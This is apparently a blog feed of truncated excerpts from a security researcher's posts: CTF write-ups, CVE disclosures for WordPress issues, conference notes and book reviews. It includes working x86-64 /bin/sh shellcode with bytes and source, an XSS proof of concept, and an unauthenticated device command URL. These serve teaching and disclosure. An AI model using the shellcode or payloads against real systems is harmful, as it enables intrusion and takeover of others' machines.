There’s fortunately been a lot of media coverage of a typically ham-fisted attempt to legislate technology:

For once, it’s not just been technology blogs: Fortune, Reuters, and USA Today are among those covering the legislative failure.

Another Milestone: Offensive Security Certified Expert

david@systemoverlord.com (David Tomaschik) — Mon, 28 Mar 2016 00:00:00 +0000

This weekend, I attempted what might possibly be my hardest academic feat ever: to pass the Offensive Security Certified Expert exam, the culmination of OffSec’s Cracking the Perimeter course. 48 hours of being pushed to my limits, followed by 24 hours of time to write a report detailing my exploits. I expected quite a challenge, but it really pushed me to my limits. The worst part of all, however, was the 50 hours or so that passed between the time I submitted my exam report and the time I got my response.

Finding My Inspiration

david@systemoverlord.com (David Tomaschik) — Thu, 24 Mar 2016 00:00:00 +0000

I’ve been having a lot of trouble lately, feeling like I’m not doing the things I need to do to move towards my personal goals or ensure that I continue to do interesting work. As one of several things I’m trying to do, I’m trying to catalog things that have inspired me recently, or whose work I aspire to imitate. This is a no-particular-order list of classes, presentations, videos, papers, and other that remind me why I love working in Information Security, in hopes that it will help me find my mojo and enthusiasm for what I do again.

Banning Encryption Will Fail... And It's a Bad Idea, Too

david@systemoverlord.com (David Tomaschik) — Wed, 23 Mar 2016 00:00:00 +0000

There’s a lot of debate going on right now about banning encryption. Now, some people might refer to this as a backdoor or “providing government access” or whatever term they’d like to use to discuss it, but as a security professional, I see only one thing as encryption: the kind that’s completely unbreakable, even by the FBI or the NSA or the Chinese government or anyone else. Anything else is simply not encryption, as it does not guarantee your confidentiality. So, I’m going to talk about banning encryption as equivalent to providing a government backdoor or any of the other clever ways it’s being spun.

BSides Seattle

david@systemoverlord.com (David Tomaschik) — Sat, 20 Feb 2016 00:00:00 +0000

These are just (essentially) my raw notes dumped from the talks I attended at BSides Seattle (2015-ish). Unfortunate I developed a migraine so I only caught the morning talks.

Active Directory

Use scripts to dump AD
Use scripts to sync with 3rd party providers
Lots of story, not much technical depth

Red Team

Presenter: Sean Malone, FusionX
Types of Security Assessment
- Vulnerability Assessment
  - Find vulnerability
  - Limited Scope
  - Broad & Shallow
  - Cooperates with SecOps
- Pentesting
  - Achieve Technical Compromise/Domain Admin
  - Moderate Depth
  - Techniques include Network, Application Assessment
- Red Team
  - Narrow Scope
  - Whole Enterprise is In Scope
  - Techniques include Social, Physical, Technical
  - RT Objectives
    - Simulate Sophisticated Adversary
    - Achieve “Nightmare Scenario” without detection
  - Client Objectives
    - Understand resiliency
    - Risk reduction, not just vulnerability count
Effective Red Teams

Offensive Security Certified Professional

david@systemoverlord.com (David Tomaschik) — Tue, 29 Dec 2015 05:32:33 +0000

It’s been a little bit since I last updated, and it’s been a busy time. I did want to take a quick moment to update and note that I accomplished something I’m pretty proud of. As of Christmas Eve, I’m now an Offensive Security Certified Professional.

Even though I’ve been working in security for more than two years, the lab and exam were still a challenge. Given that I mostly deal with web security at work, it was a great change to have a lab environment of more than 50 machines to attack. Perhaps most significantly, it gave me an opportunity to fight back a little bit of the impostor syndrome I’m perpetually afflicted with.

CSAW Quals 2015: Sharpturn (aka Forensics 400)

david@systemoverlord.com (David Tomaschik) — Mon, 21 Sep 2015 21:33:58 +0000

The text was just:

I think my SATA controller is dying.

HINT: git fsck -v

And included a tarball containing a git repository. If you ran the suggested git fsck -v, you’d discover that 3 commits were corrupt:

:::text
Checking HEAD link
Checking object directory
Checking directory ./objects/2b
Checking directory ./objects/2e
Checking directory ./objects/35
Checking directory ./objects/4a
Checking directory ./objects/4c
Checking directory ./objects/7c
Checking directory ./objects/a1
Checking directory ./objects/cb
Checking directory ./objects/d5
Checking directory ./objects/d9
Checking directory ./objects/e5
Checking directory ./objects/ef
Checking directory ./objects/f8
Checking tree 2bd4c81f7261a60ecded9bae3027a46b9746fa4f
Checking commit 2e5d553f41522fc9036bacce1398c87c2483c2d5
error: sha1 mismatch 354ebf392533dce06174f9c8c093036c138935f3
error: 354ebf392533dce06174f9c8c093036c138935f3: object corrupt or missing
Checking commit 4a2f335e042db12cc32a684827c5c8f7c97fe60b
Checking tree 4c0555b27c05dbdf044598a0601e5c8e28319f67
Checking commit 7c9ba8a38ffe5ce6912c69e7171befc64da12d4c
Checking tree a1607d81984206648265fbd23a4af5e13b289f83
Checking tree cb6c9498d7f33305f32522f862bce592ca4becd5
Checking commit d57aaf773b1a8c8e79b6e515d3f92fc5cb332860
error: sha1 mismatch d961f81a588fcfd5e57bbea7e17ddae8a5e61333
error: d961f81a588fcfd5e57bbea7e17ddae8a5e61333: object corrupt or missing
Checking blob e5e5f63b462ec6012bc69dfa076fa7d92510f22f
Checking blob efda2f556de36b9e9e1d62417c5f282d8961e2f8
error: sha1 mismatch f8d0839dd728cb9a723e32058dcc386070d5e3b5
error: f8d0839dd728cb9a723e32058dcc386070d5e3b5: object corrupt or missing
Checking connectivity (32 objects)
Checking a1607d81984206648265fbd23a4af5e13b289f83
Checking e5e5f63b462ec6012bc69dfa076fa7d92510f22f
Checking 4a2f335e042db12cc32a684827c5c8f7c97fe60b
Checking cb6c9498d7f33305f32522f862bce592ca4becd5
Checking 4c0555b27c05dbdf044598a0601e5c8e28319f67
Checking 2bd4c81f7261a60ecded9bae3027a46b9746fa4f
Checking 2e5d553f41522fc9036bacce1398c87c2483c2d5
Checking efda2f556de36b9e9e1d62417c5f282d8961e2f8
Checking 354ebf392533dce06174f9c8c093036c138935f3
Checking d57aaf773b1a8c8e79b6e515d3f92fc5cb332860
Checking f8d0839dd728cb9a723e32058dcc386070d5e3b5
Checking d961f81a588fcfd5e57bbea7e17ddae8a5e61333
Checking 7c9ba8a38ffe5ce6912c69e7171befc64da12d4c
missing blob 354ebf392533dce06174f9c8c093036c138935f3
missing blob f8d0839dd728cb9a723e32058dcc386070d5e3b5
missing blob d961f81a588fcfd5e57bbea7e17ddae8a5e61333

Well, crap. How do we fix these? Well, I guess the good news is that the git blob format is fairly well documented. The SHA-1 of a blob is computed by taking the string blob , appending the length of the blob as an ASCII-encoded decimal value, a null character, and then the blob contents itself: blob <blob_length>\0<blob_data>. The final blob value as written in the objects directory of the git repository is the zlib-compressed version of this string. This leads us to these useful functions for reading, writing, and hashing git blobs in python:

What the LastPass CLI tells us about LastPass Design

david@systemoverlord.com (David Tomaschik) — Wed, 16 Sep 2015 05:58:19 +0000

LastPass is a password manager that claims not to be able to access your data.

All sensitive data is encrypted and decrypted locally before syncing with LastPass. Your key never leaves your device, and is never shared with LastPass. Your data stays accessible only to you.

While it would be pretty hard to prove that claim, it is interesting to take a look at how they implement their zero-knowledge encryption. The LastPass browser extensions are a mess of minified JavaScript, but they’ve been kind enough to publish an open-source command line client, that’s quite readable C code. I was interested to see what we could learn from the CLI, and while it won’t prove that they can’t read your passwords, it will help to understand their design.

So, is Windows 10 Spying On You?

david@systemoverlord.com (David Tomaschik) — Sun, 16 Aug 2015 21:00:02 +0000

“Extraordinary claims require extraordinary evidence.”

A few days ago, localghost.org posted a translation of a Czech article alledging Windows 10 “phones home” in a number of ways. I was a little surprised, and more than a little alarmed, by some of the claims. Rather than blindly repost the claims, I decided it would be a good idea to see what I could test for myself. Rob Seder has done similarly but I’m taking it a step further to look at the real traffic contents.

Hacker Summer Camp 2015: DEF CON

david@systemoverlord.com (David Tomaschik) — Fri, 14 Aug 2015 03:11:12 +0000

So, following up on my post on BSides LV 2015, I thought I’d give a summary of DEF CON 23. I can’t cover everything I did (after all, what happens in Vegas, stays in Vegas… mostly) but I’m going to cover the biggest highlights as I saw them.

The first thing to know about my take on DEF CON is that DEF CON is a one-of-a-kind event, somewhere between a security conference and a trip to Mecca. It’s one part conference, one part party, and one part social experience. The second thing to know about my take on DEF CON is that I’m not there to listen to people speak. If I was just there to listen to people speak, there’s the videos posted to YouTube or available on streaming/DVD from the conference recordings. I’m at DEF CON to participate, meet people, and hack all the things.

Hacker Summer Camp 2015: BSides LV & Pros vs Joes CTF

david@systemoverlord.com (David Tomaschik) — Wed, 12 Aug 2015 00:13:58 +0000

I’ve just returned from Las Vegas for the annual “hacker summer camp”, and am going to be putting up a series of blog posts covering the week. Tuesday and Wednesday were BSides Las Vegas. For the uninitiated, BSides was founded as the “flip side” to Black Hat, and has spawned into a series of community organized and oriented conferences around the globe. Entrance to BSides LV was free, but you could guarantee a spot by donating in advance if you were so inclined. (I was.)

Playing with the Patriot Gauntlet Node (Part 2)

david@systemoverlord.com (David Tomaschik) — Sat, 20 Jun 2015 22:13:50 +0000

Despite the fact that it’s been over 2 years since I posted Part 1, I got bored and decided I should take another look at the Patriot Gauntlet Node. So I go and grab the latest firmware from Patriot’s website (V21_1.2.4.6) and use the same binwalk techniques described in the first post, I extracted the latest firmware.

So, the TL;DR is: It’s unexciting because Patriot makes no effort to secure the device. It seems that their security model is “if you’re on the network, you own the device”, which is pretty much the case. Not only can you enable telnet as I’ve discussed before, there’s even a convenient web-based interface to run commands: http://10.10.10.254:8088/adm/system_command.asp. Oh, and it’s not authenticated. Even if you set an admin password (which is hidden at http://10.10.10.254:8088/adm/management.asp).

Towards a Better Password Manager

david@systemoverlord.com (David Tomaschik) — Fri, 31 Oct 2014 01:16:10 +0000

The consensus in the security community is that passwords suck, but they’re here to stay, at least for a while longer. Given breaches like Adobe, …, it’s becoming more and more evident that the biggest threat is not weak passwords, but password reuse. Of course, the solution to password to reuse is to use one password for every site that requires you to log in. The problem is that your average user has dozens of online accounts, and they probably can’t remember those dozens of passwords. So, we build tools to help people remember passwords, mostly password managers, but do we build them well?

Dangers of decorator-based registries in Python

david@systemoverlord.com (David Tomaschik) — Sun, 26 Oct 2014 18:51:13 +0000

So Flask has a really convenient mechanism for registering handlers, actions to be run before/after requests, etc. Using decorators, Flask registers these functions to be called, as in:

#!python
@app.route('/')
def homepage_handler():
 return 'Hello World'

@app.before_request
def do_something_before_each_request():
 ...

This is pretty convenient, and works really well, because it means you don’t have to list all your routes in one place (like Django requires) but it comes with a cost. You can end up with Python modules that are only needed for the side effects of importing them. No functions from those modules are directly called from your other modules, but they still need to be imported somewhere to get the routes registered.

Getting Started in CTFs

david@systemoverlord.com (David Tomaschik) — Sun, 14 Sep 2014 20:07:10 +0000

My last post was about getting started in a career in information security. This post is about the sport end of information security: Capture the Flag (CTFs).

I’d played around with some wargames (Smash the Stack, Over the Wire, and Hack this Site) before, but my first real CTF (timed, competitive, etc.) was the CTF run by Mad Security at BSides SF 2013. By some bizarre twist of fate, I ended up winning the CTF, and I was hooked. I’ve probably played in about 30 CTFs since, most of them online with the team Shadow Cats. It’s been a bumpy ride, but I’ve learned a lot about a variety of topics by doing this.

Getting Started in Information Security

david@systemoverlord.com (David Tomaschik) — Sat, 13 Sep 2014 19:30:22 +0000

I’ve only been an information security practitioner for about a year now, but I’ve been doing things on my own for years before that. However, many people are just getting into security, and I’ve recently stumbled on a number of resources for newcomers, so I thought I’d put together a short list.

[CVE-2014-5204] Wordpress nonce Issues

david@systemoverlord.com (David Tomaschik) — Wed, 10 Sep 2014 22:54:52 +0000

Wordpress 3.9.2, released August 6th, contained fixes for two closely related vulnerabilities (CVE-2014-5204) in the way it handles Wordpress nonces (CSRF Tokens, essentially) that I reported to the Wordpress Security Team. I’d like to say the delay in my publishing this write-up was to allow people time to patch, but the reality is I’ve just been busy and haven’t gotten around to this.

TL;DR: Wordpress < 3.9.2 generated nonces in a manner that would allow an attacker to generate valid nonces for other users for a small subset of possible actions. Additionally, nonces were compared with ==, leading to a timing attack against nonce comparison. (Although this is very difficult to execute.)

Security: Not a Binary State

david@systemoverlord.com (David Tomaschik) — Fri, 05 Sep 2014 00:03:24 +0000

I’ve been spending a fair amount of time on Security StackExchange lately, mostly looking for inspiration for research and blogging, but also answering a question every now and then. One trend I’ve noticed is asking questions of the form “Is security practice X secure?”

This is asked as a yes/no question, but security isn’t a binary state. There is no “absolutely secure.” Security is a spectrum, and it really depends on what you’re worried about, which is where threat modeling comes in. Both users and service providers need to consider their risks and decide what’s important to them.

DEF CON 22 Recap

david@systemoverlord.com (David Tomaschik) — Wed, 13 Aug 2014 05:45:33 +0000

I’m back and recovering with typical post-con fatigue. This year, I made several mistakes, not the least of which was trying to do BSides, Black Hat, and DEF CON. Given the overlapping schedules and the events occurring outside the conferences, this left me really drained, not to mention spending more time transiting between the events than I’d like.

BSides Las Vegas

B-Sides was a blast, but I spent most of the time I was there playing in the Pros vs Joes CTF run by Dichotomy. This is a particularly nice Capture the Flag competition, since it’s based on defending (and attacking) “real world” networks, rather than the typical Jeopardy-style “crack this binary” competitions. Most of the problems seen in the real world aren’t, in fact, 0-day produced by talented hackers, but in fact configuration weaknesses, outdated software, and insecure practices exploited by script kiddies. PvJ forces you to consider how to harden a “corporate” environment while still providing the same services. You get a Cisco ASA as your firewall, and can reconfigure services as needed to establish your perimeter and secure your systems. On Day 2, you also get to see just how good you are at breaking in, and just how good (or bad) your opponents are at securing their network.

Weekly Reading List for 8/2/14

david@systemoverlord.com (David Tomaschik) — Sun, 03 Aug 2014 02:02:20 +0000

This has been missing for a few weeks, but it’s back!

Why is CSP Failing?

Why is CSP Failing? Trends and Challenges in CSP Adoption. Despite being an “academic” paper, this actually has a lot to offer about why one of the most effective defenses against XSS isn’t yet getting widely implemented, and what the implementation costs and strategies are.

Safari Bites the Dust

Ian Beer of Google Project Zero recently popped Safari and then proceeded to pwn OS X. This post dives into exploiting a WebKit unbounded write bug, and makes it obvious just how many hoops an attacker needs to go through compared to the ‘buffer overflow to overwrite EIP’ bugs of the ‘good old days’. It’s a great read, especially if you’re new to browser/client exploitation.

Passing Android Traffic through Burp

david@systemoverlord.com (David Tomaschik) — Sun, 13 Jul 2014 20:57:18 +0000

I wanted to take a look at all HTTP(S) traffic coming from an Android device, even if applications made direct connections without a proxy, so I set up a transparent Burp proxy. I decided to put the Proxy on my Kali VM on my laptop, but didn’t want to run an AP on there, so I needed to get the traffic to there.

Network Setup

The diagram shows that my wireless lab is on a separate subnet from the rest of my network, including my laptop. The lab network is a NAT run by IPTables on the Virtual Router. While I certainly could’ve ARP poisoned the connection between the Internet Router and the Virtual Router, or even added a static route, I wanted a cleaner solution that would be easier to enable/disable.

CVE-2014-4182 & CVE-2014-4183: XSS & XSRF in Wordpress 'Diagnostic Tool' Plugin

david@systemoverlord.com (David Tomaschik) — Fri, 04 Jul 2014 07:00:00 +0000

Versions less than 1.0.7 of the Wordpress plugin Diagnostic Tool, contain several vulnerabilities:

Persistent XSS in the Outbound Connections view. An attacker that is able to cause the site to request a URL containing an XSS payload will have this XSS stored in the database, and when an admin visits the Outbound Connections view, the payload will run. This can be trivially seen in example by running a query for http://localhost/<script>alert(/xss/)</script> on that page, then refreshing the page to see the content run, as the view is not updated in real time. This is CVE-2014-4183.

Parameter Injection in jCryption

david@systemoverlord.com (David Tomaschik) — Wed, 18 Jun 2014 01:00:00 +0000

jCryption is an open-source plugin for jQuery that is used for performing encryption on the client side that can be decrypted server side. It works by retrieving an RSA key from the server, then encrypting an AES key under the RSA key, and sending both the encrypted AES key and the RSA key to the server. This is not dissimilar to how OpenPGP encrypts data for transmission. (Though, of course, implementation details are vastly different.)

Minimal x86-64 shellcode for /bin/sh?

david@systemoverlord.com (David Tomaschik) — Thu, 05 Jun 2014 01:54:22 +0000

I was trying to figure out the minimal shellcode necessary to launch /bin/sh from a 64-bit processor, and the smallest I could come up with is 25 bytes: \x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x31\xc0\x99\x31\xf6\x54\x5f\xb0\x3b\x0f\x05.

This was produced from the following source:

BITS 64

main:
 mov rbx, 0xFF978CD091969DD1
 neg rbx
 push rbx
 xor eax, eax
 cdq
 xor esi, esi
 push rsp
 pop rdi
 mov al, 0x3b ; sys_execve
 syscall

Compile with nasm, examine the output with objdump -M intel -b binary -m i386:x86-64 -D shellcode.

Secuinside Quals 2014: Simple Login

david@systemoverlord.com (David Tomaschik) — Wed, 04 Jun 2014 02:08:25 +0000

In this challenge, we received the source for a site with a pretty basic login functionality. Aside from some boring forms, javascript, and css, we have this PHP library for handling the session management:

#!php
<?
	class common{
		public function getidx($id){
			$id = mysql_real_escape_string($id);
			$info = mysql_fetch_array(mysql_query("select idx from member where id='".$id."'"));
			return $info[0];
		}

		public function getpasswd($id){
			$id = mysql_real_escape_string($id);
			$info = mysql_fetch_array(mysql_query("select password from member where id='".$id."'"));
			return $info[0];
		}

		public function islogin(){
			if( preg_match("/[^0-9A-Za-z]/", $_COOKIE['user_name']) ){
	 			exit("cannot be used Special character");
			}

			if( $_COOKIE['user_name'] == "admin" )	return 0;

			$salt = file_get_contents("../../long_salt.txt");

			if( hash('crc32',$salt.'|'.(int)$_COOKIE['login_time'].'|'.$_COOKIE['user_name']) == $_COOKIE['hash'] ){
				return 1;
			}

			return 0;
		}

		public function autologin(){

		}

		public function isadmin(){
			if( $this->getidx($_COOKIE['user_name']) == 1){
				return 1;
			}

			return 0;
		}

		public function insertmember($id, $password){
			$id = mysql_real_escape_string($id);
			mysql_query("insert into member(id, password) values('".$id."', '".$password."')") or die();

			return 1;
		}
	}
?>

Some first impressions:

Secuinside Quals 2014: Shellcode 100

david@systemoverlord.com (David Tomaschik) — Mon, 02 Jun 2014 04:57:01 +0000

This is a level that, at first, seemed like it would be extremely simple, but then turned out to be far more complicated than expected. We were provided a zip file containing a python script and an elf binary.

Disassembling the binary reveals a very basic program:

/ (fcn) sym.main 165
| 0x0804847d 55 push ebp
| 0x0804847e 89e5 mov ebp, esp
| 0x08048480 83e4f0 and esp, 0xfffffff0
| 0x08048483 83ec30 sub esp, 0x30
| 0x08048486 8b450c mov eax, [ebp+0xc]
| 0x08048489 83c004 add eax, 0x4
| 0x0804848c 8b00 mov eax, [eax]
| 0x0804848e 890424 mov [esp], eax
| ; CODE (CALL) XREF from 0x08048376 (fcn.08048376)
| ; CODE (CALL) XREF from 0x08048370 (fcn.08048366)
| 0x08048491 e8dafeffff call 0x108048370 ; (sym.imp.atoi)
| sym.imp.atoi(unk)
| 0x08048496 89442428 mov [esp+0x28], eax
| 0x0804849a c7442424000. mov dword [esp+0x24], 0x0
| 0x080484a2 c7442408040. mov dword [esp+0x8], 0x4
| 0x080484aa 8d442424 lea eax, [esp+0x24]
| 0x080484ae 89442404 mov [esp+0x4], eax
| 0x080484b2 8b442428 mov eax, [esp+0x28]
| 0x080484b6 890424 mov [esp], eax
| ; CODE (CALL) XREF from 0x08048330 (fcn.0804832c)
| 0x080484b9 e872feffff call 0x108048330 ; (sym.imp.read)
| sym.imp.read()
| 0x080484be 8b442424 mov eax, [esp+0x24]
| 0x080484c2 c7442414000. mov dword [esp+0x14], 0x0
| 0x080484ca c7442410fff. mov dword [esp+0x10], 0xffffffff
| 0x080484d2 c744240c220. mov dword [esp+0xc], 0x22
| 0x080484da c7442408070. mov dword [esp+0x8], 0x7
| 0x080484e2 89442404 mov [esp+0x4], eax
| 0x080484e6 c7042400000. mov dword [esp], 0x0
| ; CODE (CALL) XREF from 0x08048350 (fcn.08048346)
| 0x080484ed e85efeffff call 0x108048350 ; (sym.imp.mmap)
| sym.imp.mmap()
| 0x080484f2 8944242c mov [esp+0x2c], eax
| 0x080484f6 8b442424 mov eax, [esp+0x24]
| 0x080484fa 89442408 mov [esp+0x8], eax
| 0x080484fe 8b44242c mov eax, [esp+0x2c]
| 0x08048502 89442404 mov [esp+0x4], eax
| 0x08048506 8b442428 mov eax, [esp+0x28]
| 0x0804850a 890424 mov [esp], eax
| 0x0804850d e81efeffff call 0x108048330 ; (sym.imp.read)
| sym.imp.read()
| 0x08048512 31c0 xor eax, eax
| 0x08048514 31c9 xor ecx, ecx
| 0x08048516 31d2 xor edx, edx
| 0x08048518 31db xor ebx, ebx
| 0x0804851a 31f6 xor esi, esi
| 0x0804851c 31ff xor edi, edi
\ 0x0804851e ff64242c jmp dword [esp+0x2c]

It takes a single argument, an integer, which it uses as a file descriptor for input. It then reads 4 bytes from the file descriptor, mmap’s an anonymous block of memory of that size with RWX permissions, then reads that many bytes from the file descriptor into the mapped region, and finally jumps to the map region. So, in summary, read shellcode length, read shellcode, then jump to shellcode.

Secuinside Quals 2014: Javascript Jail (Misc 200)

david@systemoverlord.com (David Tomaschik) — Mon, 02 Jun 2014 03:43:33 +0000

The challenge was pretty straightforward: connect to a service that’s running a Javascript REPL, and extract the flag. You were provided a check function that was created by the checker function given below:

#!javascript
function checker(flag, myRand) {
 return function (rand) {
 function stage1() {
 var a = Array.apply(null, new Array(Math.floor(Math.random() * 20) + 10)).map(function () {return Math.random() * 0x10000;});
 var b = rand(a.length);

 if (!Array.isArray(b)) {
 print("You're a cheater!");
 return false;
 }

 if (b.length < a.length) {
 print("hmm.. too short..");
 for (var i = 0, n = a.length - b.length; i < n; i++) {
 delete b[b.length];
 b[b.length] = [Math.random() * 0x10000];
 }
 } else if (b.length > a.length) {
 print("hmm.. too long..");
 for (var i = 0, n = b.length - a.length; i < n; i++)
 Array.prototype.pop.apply(b);
 }

 for (var i = 0, n = b.length; i < n; i++) {
 if (a[i] != b[i]) {
 print("ddang~~");
 return false;
 }
 }

 return true;
 }

 function stage2() {
 var a = Array.apply(null, new Array((myRand() % 20) + 10)).map(function () {return myRand() % 0x10000;});
 var b = rand(a.length);

 if (!Array.isArray(b)) {
 print("You're a cheater!");
 return false;
 }

 if (b.length < a.length) {
 print("hmm.. too short..");
 for (var i = 0, n = a.length - b.length; i < n; i++) {
 delete b[b.length];
 b[b.length] = [Math.random() * 0x10000];
 }
 } else if (b.length > a.length) {
 print("hmm.. too long..");
 for (var i = 0, n = b.length - a.length; i < n; i++)
 Array.prototype.pop.apply(b);
 }

 for (var i = 0, n = b.length; i < n; i++) {
 if (a[i] != b[i]) {
 print("ddang~~");
 return false;
 }
 }

 return true;
 }

 print("stage1");

 if (!stage1())
 return;

 print("stage2");

 if (!stage2())
 return;

 print("awesome!");
 return flag;
 };
}

As you can tell, there are two nearly identical stages that create an array of random length (10-30) consisting of random values. The only difference is in how the random values are generated: once from Math.random, and, in stage 2, from a function provided by the factory function. This function was not available to us to reverse the functionality of.

Weekly Reading List for 5/30/14

david@systemoverlord.com (David Tomaschik) — Fri, 30 May 2014 07:00:00 +0000

It’s been a busy week, so I’m just going to drop some info about Radare2.

Radare2 Materials

On the TrueCrypt Saga

david@systemoverlord.com (David Tomaschik) — Fri, 30 May 2014 00:52:47 +0000

If you’re anywhere near the security community, you’ve probably already heard about the (supposed) end of TrueCrypt that inspired a massive hunt for an explanation on Reddit. I’m going to drop my thoughts here, but these are all just speculation, so take them for what they’re worth (which is not much).

The Facts as We Know Them

TrueCrypt 7.2 dropped support for creating volumes. The code was massively changed, stripping out all volume creation options.
The website was updated with terrible instructions. The directions for alternatives generally point to proprietary options (BitLocker, File Vault, or, to paraphrase, “whatever you can find on Linux.”)
The new version is signed with the same key as previous versions. This implies whoever did the update is in possession of the key used for signing previous releases.
Sourceforge doesn’t think the account was compromised as posted here.

Popular Theories

The author was forced to backdoor TC and chose this instead. This seems to be the most popular theory, and given the Snowden revelations, it’s easy to see why. Assuming the adversary in question is the US Government, this seems awfully heavy-handed, and I’m not sure under which legal authority they would attempt to compel this participation. NSLs compel the production of business records, but don’t seem to allow them to force a backdooring. CALEA is for communications tools, TrueCrypt is used for storage at rest. Even those who refer to LavaBit are referring to warrants. First LavaBit was ordered to turn over messages, then encryption keys, but I’m not aware they were ever ordered to backdoor their software. It also seems odd that government agencies would choose to go after disk encryption, seems like communications encryption would be the bigger source of intelligence. There are those who have claimed “the government can force you to do anything”, which I suppose is true, but if we’re at the stage of “backdoor your code or we treat you as a terrorist” then the game’s already over, we’re off in Stasi territory, and I’m not sure that’s a world I could live in. I hope this is not the story.
The author tired of developing it and just gave up. This is a kind of odd approach, one would think they’d look for someone to hand the project to. I’m also not sure why someone who’d devoted years to developing secure encryption software would suddenly offer up terrible alternatives or otherwise deviate so strangely.
A developer was compromised. While this might give access to the PGP key, I’d have thought by now we’d have some sort of communication somewhere to claim this has happened. Unless the developer is completely out of the loop as well. Why would someone use the compromise to offer up terrible alternatives as opposed to releasing backdoored binaries quietly?
Off their meds. A couple of people have suggested that some sort of psychiatric problem is involved here. Actually seems a little reasonable, given the erratically written directions for alternatives, the sudden change in course, everything. Of course, there’s no evidence to support this, so it’s really just speculation.

I’ve turned off commenting as I think Reddit or Hacker News is a better place for such discussion, I just had a lot of thoughts I wanted to get out.

Weekly Reading List for 5/23/14

david@systemoverlord.com (David Tomaschik) — Fri, 23 May 2014 07:00:00 +0000

###Radare2 Book Maijin on GitHub is in the process of putting together an online book for Radare2. I’ve been looking for a good resource for using Radare2, and this is a great start.

###Reverse Engineering for Beginners Dennis Yurichev has a free eBook on Reverse Engineering. I haven’t gotten through it yet, but it looks interesting, and you can’t beat the price.

###Hacker Playbook Finally, I finished up The Hacker Playbook: Practical Guide To Penetration Testing this week. You can find my full review here.

DEF CON 22 CTF Quals: 3dttt

david@systemoverlord.com (David Tomaschik) — Wed, 21 May 2014 14:07:02 +0000

Unlike most of the challenges in DC22 quals, this one required no binary exploitation, no reversing, just writing a little code. You needed to play 3-D Tic Tac Toe, and you needed to play fast. Unfortunately, I didn’t record the sessions, so I don’t have the example output.

Basically, you just received an ASCII representation of each of the 3 boards making up the 3d-tic-tac-toe environment, and were prompted to provide x,y,z coordinates for your next move. However, you had only a very short period of time (fractions of a second) to send your move, so playing by hand was impossible. The winner of each board was the player with the most rows won, and it did go to the full 27 moves each time. Also, it’s important to note that the player always goes first, and that you have to win 50 rounds in order to receive the flag.

Book Review: The Hacker Playbook...

david@systemoverlord.com (David Tomaschik) — Wed, 21 May 2014 01:10:54 +0000

The Hacker Playbook: Practical Guide To Penetration Testing is an attempt to use a continuous series of football metaphors to describe the process of a network penetration test. Maybe the metaphors would work better for someone who actually watches sports, but I felt they were a bit strained and forced at times. That being said, the actual content and techniques described are solid and generally useful information. It’s arranged in the stages of a good penetration test, and reads like a strong guide for those relatively new to penetration testing. Unfortunately, it doesn’t set up general guides for each area as much as describing specific “plays” for each area, so once those techniques start to fall flat, it doesn’t leave you with a lot of depth.

DEF CON 22 CTF Quals: Hackertool

david@systemoverlord.com (David Tomaschik) — Mon, 19 May 2014 03:32:11 +0000

Hackertool was one of the Baby’s First challenges in DEF CON CTF Quals this year, and provided you with a .torrent file, and asked you to download the file and MD5 it. Seems easy enough, so I knew there must be more to it. The torrent file itself was a whopping 4 MB in size, very large for a torrent file. Looking at it, we see it contains just one file, named every_ip_address.txt, and the file is ~61GB in size. Hrrm, there must be an easier way than torrenting 61GB, especially at <1k/s.

The Machine Inside the Machine

david@systemoverlord.com (David Tomaschik) — Tue, 13 May 2014 04:24:00 +0000

Imagine this scenario:

One of your employees visits a site offering a program to download videos from a popular video site. Because they’d like to throw some videos on their phone, they download and install it, but it comes with a hitchhiker: a RAT, or remote access trojan. So Trudy, an attacker, has a foothold, but the user isn’t an administrator, so she starts looking at the network for a place to pivot. Scanning a private subnet, she finds a number of consecutive IP addresses all offering webservers, FTP servers, and even telnet! Connecting to one, the attacker suddenly realizes she has just found her golden ticket…

Reading List for 5/9/2014

david@systemoverlord.com (David Tomaschik) — Fri, 09 May 2014 07:00:00 +0000

###On XTS Mode for Disk Encryption Thomas Ptacek writes You Don’t Want XTS, and suggests that though XTS works well enough in practice, it is far from ideal for Full Disk Encryption, and should not be used at all for other encryption operations (i.e., anything that doesn’t resemble FDE). XTS is useful only in that it makes “random access” encryption more secure, as you need for a disk. For encryption of whole blocks of data at rest, you probably want CBC mode, and for anything on the wire, AES-GCM is the new hotness.

Announcement: PwnableWeb Released

david@systemoverlord.com (David Tomaschik) — Fri, 09 May 2014 00:11:58 +0000

In addition to my primary interest in the technical aspects of information security, I’m also a big fan of wargames & CTFs as educational tools, so a while back, I decided I wanted to build a web-based wargame and CTF scoreboard system. Today I am releasing the results of that, dubbed PwnableWeb, under the Apache 2.0 License. It includes web-based wargame-style challenges and an accompanying scoreboard.

###The Framework Each vulnerable site is built on top of a small framework that provides common functionality, and also provides a framework for building a client for interactive exploitation. (It provides a target to exploit XSS and XSRF against.)

Book Review: Red Team Field Manual

david@systemoverlord.com (David Tomaschik) — Fri, 02 May 2014 15:24:27 +0000

I recently picked up a copy of the Red Team Field Manual on Amazon after hearing good things from a few people in the industry. It’s information dense, basically a concatenation of cheat sheets for everything you’d want to do during a pentest. I’m mostly a Linux/Unix guy, and given my role on an internal red team for a mostly Linux company, I don’t do a lot of Windows. However, I recently had an engagement where we were targeting Windows, and I wish I’d had the RTFM handy then: there are a number of great pointers for Windows that I could’ve leveraged to make my engagement go more smoothly. Additionally, the book provides coverage for other platforms, like Cisco IOS, and for various scripting situations in Powershell, Python, or even Scapy.

A Brief History of the Internet (Security-Wise)

david@systemoverlord.com (David Tomaschik) — Wed, 16 Apr 2014 04:55:14 +0000

I originally posted this to the DC404 Mailing List, but got some positive feedback, so I thought I’d post it here as well. The broad strokes should be correct, but there might be some inaccuracies here — if you’re aware of one, please let me know and I’ll correct it.

There was a thread ongoing about Heartbleed, and it turned into a question of why security on the Internet is so complicated, and couldn’t it be any simpler? Well, the truth be told, security on the Internet is a house of cards.

PlaidCTF 2014: Conclusion

david@systemoverlord.com (David Tomaschik) — Mon, 14 Apr 2014 17:30:42 +0000

The 2014 edition of PlaidCTF was excellent, but I wish we’d been able to make it through more challenges. We cleared about 7 challenges, but really only two of them felt worth writing up. The others have been well documented elsewhere, no sense in rewriting the same thing.

I liked how the challenges often required a series of exploits/techniques, this is much like what happens in the real world. I do wish I had spent more time on binary exploitation, attempting to get a solution to _nightmares_ burned a lot of time.

PlaidCTF 2014: ReeKeeeee

david@systemoverlord.com (David Tomaschik) — Mon, 14 Apr 2014 06:46:01 +0000

